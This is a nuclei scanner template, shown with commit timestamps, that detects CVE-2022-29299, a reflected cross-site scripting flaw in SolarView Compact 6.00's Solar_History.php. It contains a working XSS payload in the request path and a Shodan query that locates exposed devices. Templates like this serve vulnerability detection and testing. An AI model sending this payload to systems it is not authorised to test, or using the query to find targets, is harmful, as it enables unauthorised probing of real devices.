nuclei-templates/http/cves/2022/CVE-2022-29299.yaml

43 lines
1.2 KiB
YAML
Raw Normal View History

2022-06-15 17:03:09 +00:00
id: CVE-2022-29299
info:
2022-06-16 05:40:31 +00:00
name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting
2022-06-15 17:03:09 +00:00
author: For3stCo1d
severity: medium
2022-06-22 03:35:29 +00:00
description: |
SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.
2022-06-15 17:03:09 +00:00
reference:
- https://www.exploit-db.com/exploits/50967
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299
2022-06-21 13:31:04 +00:00
classification:
cve-id: CVE-2022-29299
2022-06-15 17:03:09 +00:00
metadata:
2022-06-16 05:40:31 +00:00
verified: true
2022-06-15 17:03:09 +00:00
shodan-query: http.favicon.hash:-244067125
tags: cve,cve2022,xss,solarview,edb
2022-06-15 17:03:09 +00:00
http:
2022-06-15 17:03:09 +00:00
- method: GET
path:
- '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-06-16 05:40:31 +00:00
- '<script>alert(document.domain)</script><"">'
- '/Solar_History.php" METHOD="post">'
condition: and
2022-06-15 17:03:09 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
2022-06-21 13:31:04 +00:00
# Enhanced by cs 06/21/2022